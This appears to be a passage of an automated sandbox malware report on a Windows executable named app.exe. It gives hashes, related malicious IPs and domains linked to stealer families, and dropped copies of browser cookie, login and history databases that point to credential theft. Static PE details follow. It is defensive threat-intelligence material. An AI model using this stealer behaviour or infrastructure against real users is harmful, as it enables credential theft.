                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 99%
                                                                                                                                          • Number of executed functions: 35
                                                                                                                                          • Number of non-executed functions: 212
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Stop behavior analysis, all processes terminated

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): WMIADAP.exe
                                                                                                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          00:24:47API Interceptor49x Sleep call for process: app.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          144.208.127.230crypted.bin.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                          • 144.208.127.230/
                                                                                                                                          crypted.bin.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                          • 144.208.127.230/
                                                                                                                                          172.67.74.152Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                                                                                                                          • api.ipify.org/?format=json
                                                                                                                                          Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • api.ipify.org/?format=json
                                                                                                                                          Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • api.ipify.org/?format=json
                                                                                                                                          Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                                                                                                          • api.ipify.org/?format=json
                                                                                                                                          Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                                                                                                          • api.ipify.org/?format=json
                                                                                                                                          SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • api.ipify.org/?format=json
                                                                                                                                          SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • api.ipify.org/?format=json
                                                                                                                                          Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • api.ipify.org/?format=json

                                                                                                                                          Domains

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          api.ipify.orgINVOICE KAD-0138-2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          Supplier Order Scan 0001293039493.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                          • 104.26.13.205
                                                                                                                                          file.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          DHL_VTER000105453.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          DHL_VTER000105450.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                          • 104.26.12.205
                                                                                                                                          DHL Receipt_AWB 9899691321..exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          FACTURAS-ALBARANES.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          Order PS24S0040.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          1110022.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          Transfer copy PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                          • 104.26.13.205

                                                                                                                                          ASNs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          SHOCK-1USnUswWbPPmT.ocx.dllGet hashmaliciousUnknownBrowse
                                                                                                                                          • 209.182.225.225
                                                                                                                                          nUswWbPPmT.ocx.dllGet hashmaliciousUnknownBrowse
                                                                                                                                          • 209.182.225.225
                                                                                                                                          Incident_Report_Harassment_by_Employee.docGet hashmaliciousUnknownBrowse
                                                                                                                                          • 209.182.225.225
                                                                                                                                          out.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 209.182.225.225
                                                                                                                                          out.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 209.182.225.225
                                                                                                                                          potrgssavalue.msiGet hashmaliciousUnknownBrowse
                                                                                                                                          • 209.182.225.225
                                                                                                                                          down.dllGet hashmaliciousUnknownBrowse
                                                                                                                                          • 209.182.225.225
                                                                                                                                          down.dllGet hashmaliciousUnknownBrowse
                                                                                                                                          • 209.182.225.225
                                                                                                                                          crypted.bin.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                          • 144.208.127.230
                                                                                                                                          crypted.bin.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                          • 144.208.127.230
                                                                                                                                          CLOUDFLARENETUShttps://pub-12f6f4c3b63f41829408f4f27b70cb51.r2.dev/02aaa.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          SecuriteInfo.com.Variant.Lazy.387025.32273.29448.exeGet hashmaliciousRedLineBrowse
                                                                                                                                          • 104.20.4.235
                                                                                                                                          SecuriteInfo.com.Variant.Lazy.387025.32273.29448.exeGet hashmaliciousRedLineBrowse
                                                                                                                                          • 172.67.19.24
                                                                                                                                          SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 172.67.131.204
                                                                                                                                          SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 104.21.39.216
                                                                                                                                          SecuriteInfo.com.Trojan.MulDrop9.4697.30323.11244.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.36.2
                                                                                                                                          7Ql51TchBG.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                                                          • 172.67.169.18
                                                                                                                                          INVOICE KAD-0138-2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          Orden de compra 0001-00255454.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                                                          • 172.67.177.134
                                                                                                                                          0KRPn.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 104.21.45.138

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1Template_signed_0405.dotm.docGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          SecuriteInfo.com.Variant.Lazy.387025.32273.29448.exeGet hashmaliciousRedLineBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          Pedido-Faturado-398731.msiGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          PIO88938MB.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          NFs_98776.msiGet hashmaliciousVMdetectBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          taEPf27YpR.xllGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          taEPf27YpR.xllGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          shipping doc.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 172.67.74.152

                                                                                                                                          Dropped Files

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeTemplate_signed_0405.dotm.docGet hashmaliciousUnknownBrowse

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\app.exe
                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1290240
                                                                                                                                            Entropy (8bit):7.441704402192102
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:CIFxe+AY3rqYsavMOQdbac5IQH97wiI3dzAr09UDZ5YUD8:1xeSNR0vbac5/d8P3diDZ6q
                                                                                                                                            MD5:75B9EF9142A78671D449C8D22AB6BE14
                                                                                                                                            SHA1:0461F1C46644ACDE8020BB59B53B1E34B65977CA
                                                                                                                                            SHA-256:E9BC44CF548A70E7285499209973FAF44B7374DECE1413DFCDC03BF25A6C599C
                                                                                                                                            SHA-512:14EF889F580C02E319B6D9D899DDBD1BD523C1D8B493EAB8B98DA6D3D276D76EFB9B5694759DF7D68BB9D002A8ACE8FC82D22121A7B4EA236D5F9CEF38CC809C
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                            • Antivirus: Virustotal, Detection: 11%, Browse
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: Template_signed_0405.dotm.doc, Detection: malicious, Browse
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........P(..>{..>{..>{?.c{..>{v..{..>{...{..>{f."{..>{e."{..>{F.'{..>{..?{..>{F.~{..>{F."{&.>{...{..>{..5{..>{..^{..>{F.#{.>{F.{{..>{F..{..>{Rich..>{................PE..L......P.............................]............@.......................... ..............................................$........................................................................................................................text...2........................... ....rdata...&.......0..................@..@.data........ ...@... ..............@....rsrc................`..............@..@)m&......P.......P...`.................@........................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe:Zone.Identifier

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\app.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):26
                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                            C:\Users\user\AppData\Local\Temp\Cookies

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x9, schema 4, UTF-8, version-valid-for 10
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):28672
                                                                                                                                            Entropy (8bit):1.5161495002712742
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:s3n5HGsht8kAM0hsYfxqYgXZBqIcsrl3tuY2sWsqF:c5mF5wnpx9uYSF
                                                                                                                                            MD5:16A6EDF5F48F2A7B20B3B8825384B05C
                                                                                                                                            SHA1:A59542299A41166F515B18AB8CBC3D72517ED207
                                                                                                                                            SHA-256:3E1A2BB358B396C201A6058EC8A05E25B167255EB3DAEEB1130331A298CC6F93
                                                                                                                                            SHA-512:7C4C9D69B05EA5B120C0DB6DF7D0C4487387659AF6D17C387503CA360EF8430F676B0964B6BC3C368BA4DC8D0E648B2750C26970D833788982BBF5BC04AC632D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................S`..=......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\History

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 4, database pages 35, cookie 0x1e, schema 4, UTF-8, version-valid-for 4
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):163840
                                                                                                                                            Entropy (8bit):0.44975538801868414
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Ou1HAU+bDoYysX0uhnyZtha58VjN9DLjGQLBE3u:Ou1X+bDo3irhnyBi8Vj3XBBE3u
                                                                                                                                            MD5:89E4498D0328AFC71113CC75EBE7D770
                                                                                                                                            SHA1:120CF58C897FF1025F8B4F854A21821D948F74BC
                                                                                                                                            SHA-256:F50B271AFE0D4950FAE539E4A04C3D07849F0CE2250E73B352CDB3D981095B40
                                                                                                                                            SHA-512:7914EDF9352FBB1ABB6A0B89A4F47F09DE5672DEB6B4BE9EBEA833C8D1ED3EFD5AD16A612DF3DF65C878EB577FD0B697BC44C3E52D9BBFB82A81C1C903621989
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......#..................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\Login Data

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):57344
                                                                                                                                            Entropy (8bit):0.7310370201569906
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
                                                                                                                                            MD5:A802F475CA2D00B16F45FEA728F2247C
                                                                                                                                            SHA1:AF57C02DA108CFA0D7323252126CC87D7B608786
                                                                                                                                            SHA-256:156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
                                                                                                                                            SHA-512:275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\Web Data

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):122880
                                                                                                                                            Entropy (8bit):1.1414673161713362
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                                                                            MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                                                                            SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                                                                            SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                                                                            SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):7.441704402192102
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:app.exe
                                                                                                                                            File size:1'290'240 bytes
                                                                                                                                            MD5:75b9ef9142a78671d449c8d22ab6be14
                                                                                                                                            SHA1:0461f1c46644acde8020bb59b53b1e34b65977ca
                                                                                                                                            SHA256:e9bc44cf548a70e7285499209973faf44b7374dece1413dfcdc03bf25a6c599c
                                                                                                                                            SHA512:14ef889f580c02e319b6d9d899ddbd1bd523c1d8b493eab8b98da6d3d276d76efb9b5694759df7d68bb9d002a8ace8fc82d22121a7b4ea236d5f9cef38cc809c
                                                                                                                                            SSDEEP:24576:CIFxe+AY3rqYsavMOQdbac5IQH97wiI3dzAr09UDZ5YUD8:1xeSNR0vbac5/d8P3diDZ6q
                                                                                                                                            TLSH:8255CF05F3D2B8B1D15192772DC96161B6ED993048D83F0732D0EE5E1B3B9A6B40FE2A
                                                                                                                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........P(..>{..>{..>{?.c{..>{v..{..>{...{..>{f."{..>{e."{..>{F.'{..>{..?{..>{F.~{..>{F."{&.>{...{..>{..5{..>{..^{..>{F.#{..>{F.{{..>

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:0f4ecda7ae5d1715

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x415dde
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows cui
                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:
                                                                                                                                            Time Stamp:0x500F9507 [Wed Jul 25 06:41:11 2012 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:26600adf486f72b556f917a64c8fd23f

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            push 00000060h
                                                                                                                                            push 0043A478h
                                                                                                                                            call 00007F8C48B70DE3h
                                                                                                                                            mov edi, 00000094h
                                                                                                                                            mov eax, edi
                                                                                                                                            call 00007F8C48B6F33Fh
                                                                                                                                            mov dword ptr [ebp-18h], esp
                                                                                                                                            mov esi, esp
                                                                                                                                            mov dword ptr [esi], edi
                                                                                                                                            push esi
                                                                                                                                            call dword ptr [0042F2B4h]
                                                                                                                                            mov ecx, dword ptr [esi+10h]
                                                                                                                                            mov dword ptr [0044B190h], ecx
                                                                                                                                            mov eax, dword ptr [esi+04h]
                                                                                                                                            mov dword ptr [0044B19Ch], eax
                                                                                                                                            mov edx, dword ptr [esi+08h]
                                                                                                                                            mov dword ptr [0044B1A0h], edx
                                                                                                                                            mov esi, dword ptr [esi+0Ch]
                                                                                                                                            and esi, 00007FFFh
                                                                                                                                            mov dword ptr [0044B194h], esi
                                                                                                                                            cmp ecx, 02h
                                                                                                                                            je 00007F8C48B6FCDEh
                                                                                                                                            or esi, 00008000h
                                                                                                                                            mov dword ptr [0044B194h], esi
                                                                                                                                            shl eax, 08h
                                                                                                                                            add eax, edx
                                                                                                                                            mov dword ptr [0044B198h], eax
                                                                                                                                            xor esi, esi
                                                                                                                                            push esi
                                                                                                                                            mov edi, dword ptr [0042F20Ch]
                                                                                                                                            call edi
                                                                                                                                            cmp word ptr [eax], 5A4Dh
                                                                                                                                            jne 00007F8C48B6FCF1h
                                                                                                                                            mov ecx, dword ptr [eax+3Ch]
                                                                                                                                            add ecx, eax
                                                                                                                                            cmp dword ptr [ecx], 00004550h
                                                                                                                                            jne 00007F8C48B6FCE4h
                                                                                                                                            movzx eax, word ptr [ecx+18h]
                                                                                                                                            cmp eax, 0000010Bh
                                                                                                                                            je 00007F8C48B6FCF1h
                                                                                                                                            cmp eax, 0000020Bh
                                                                                                                                            je 00007F8C48B6FCD7h
                                                                                                                                            mov dword ptr [ebp-1Ch], esi
                                                                                                                                            jmp 00007F8C48B6FCF9h
                                                                                                                                            cmp dword ptr [ecx+00000084h], 0Eh
                                                                                                                                            jbe 00007F8C48B6FCC4h
                                                                                                                                            xor eax, eax
                                                                                                                                            cmp dword ptr [ecx+000000F8h], esi
                                                                                                                                            jmp 00007F8C48B6FCE0h
                                                                                                                                            cmp dword ptr [ecx+74h], 0Eh
                                                                                                                                            jbe 00007F8C48B6FCB4h
                                                                                                                                            xor eax, eax
                                                                                                                                            cmp dword ptr [ecx+000000E8h], esi
                                                                                                                                            setne al
                                                                                                                                            mov dword ptr [ebp-1Ch], eax

                                                                                                                                            Rich Headers

                                                                                                                                            Programming Language:
                                                                                                                                            • [ASM] VS2002 (.NET) build 9466
                                                                                                                                            • [ C ] VS2002 (.NET) build 9466
                                                                                                                                            • [C++] VS2003 (.NET) build 3077
                                                                                                                                            • [C++] VS2002 (.NET) build 9466
                                                                                                                                            • [RES] VS2002 (.NET) build 9466
                                                                                                                                            • [LNK] VS2002 (.NET) build 9466

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3f9240x118.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000x2f5f0.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2f0000x594.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                            Sections

                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x10000x2db320x2e0007868e2f41e5b3ab908ac5a72a66f5953False0.6095076851222826data6.670624963209676IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .rdata0x2f0000x126c60x13000efd458d4cde7206fd4c5482997a30ba9False0.4482421875data5.736665908168061IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .data0x420000xa9f40x400007b79e131c84ddfb0842641915843ec1False0.4459228515625data5.072911159589167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .rsrc0x4d0000x2f5f00x300002686df77c23e2ca3144ababd1a5e1501False0.2823994954427083data4.484521144858898IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            )m&0x7d0000xc50000xc5000acab40631ef6f655b384348be6aac2b9False0.841724996034264data7.775469163423906IMAGE_SCN_MEM_READ

                                                                                                                                            Resources

                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            JPG0x4f2b00x2b1e6PC bitmap, Windows 3.x format, 635 x 276 x 8, cbSize 176614, bits offset 1078ChineseChina0.27774128891254374
                                                                                                                                            RT_CURSOR0x7a4980x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"ChineseChina0.4805194805194805
                                                                                                                                            RT_CURSOR0x7a5d00xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"ChineseChina0.7
                                                                                                                                            RT_CURSOR0x7a6b00x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.36363636363636365
                                                                                                                                            RT_CURSOR0x7a8000x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.35714285714285715
                                                                                                                                            RT_CURSOR0x7a9500x134dataChineseChina0.37337662337662336
                                                                                                                                            RT_CURSOR0x7aaa00x134dataChineseChina0.37662337662337664
                                                                                                                                            RT_CURSOR0x7abf00x134Targa image data 64 x 65536 x 1 +32 "\001"ChineseChina0.36688311688311687
                                                                                                                                            RT_CURSOR0x7ad400x134Targa image data 64 x 65536 x 1 +32 "\001"ChineseChina0.37662337662337664
                                                                                                                                            RT_CURSOR0x7ae900x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.36688311688311687
                                                                                                                                            RT_CURSOR0x7afe00x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.38636363636363635
                                                                                                                                            RT_CURSOR0x7b1300x134dataChineseChina0.44155844155844154
                                                                                                                                            RT_CURSOR0x7b2800x134dataChineseChina0.4155844155844156
                                                                                                                                            RT_CURSOR0x7b3d00x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.5422077922077922
                                                                                                                                            RT_CURSOR0x7b5200x134dataChineseChina0.2662337662337662
                                                                                                                                            RT_CURSOR0x7b6700x134dataChineseChina0.2824675324675325
                                                                                                                                            RT_CURSOR0x7b7c00x134dataChineseChina0.3246753246753247
                                                                                                                                            RT_BITMAP0x7b9f80xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80ChineseChina0.44565217391304346
                                                                                                                                            RT_BITMAP0x7bab00x144Device independent bitmap graphic, 33 x 11 x 4, image size 220ChineseChina0.37962962962962965
                                                                                                                                            RT_ICON0x4db700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsChineseChina0.6042418772563177
                                                                                                                                            RT_ICON0x4e4300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsChineseChina0.6042418772563177
                                                                                                                                            RT_DIALOG0x4ecf00x23edataChineseChina0.5174216027874564
                                                                                                                                            RT_DIALOG0x4ef300x94dataChineseChina0.6959459459459459
                                                                                                                                            RT_DIALOG0x7b9100xe2dataChineseChina0.6637168141592921
                                                                                                                                            RT_STRING0x7bbf80x46dataChineseChina0.6857142857142857
                                                                                                                                            RT_STRING0x7bc400x54dataChineseChina0.8571428571428571
                                                                                                                                            RT_STRING0x7bc980x2cdataChineseChina0.5909090909090909
                                                                                                                                            RT_STRING0x7bcc80x74dataChineseChina0.8448275862068966
                                                                                                                                            RT_STRING0x7bd400x1d0dataChineseChina0.8060344827586207
                                                                                                                                            RT_STRING0x7c0880x164dataChineseChina0.48314606741573035
                                                                                                                                            RT_STRING0x7bf500x132dataChineseChina0.6405228758169934
                                                                                                                                            RT_STRING0x7c5700x50dataChineseChina0.725
                                                                                                                                            RT_STRING0x7bf100x40dataChineseChina0.65625
                                                                                                                                            RT_STRING0x7c4d80x6adataChineseChina0.7452830188679245
                                                                                                                                            RT_STRING0x7c1f00x1d6dataChineseChina0.6723404255319149
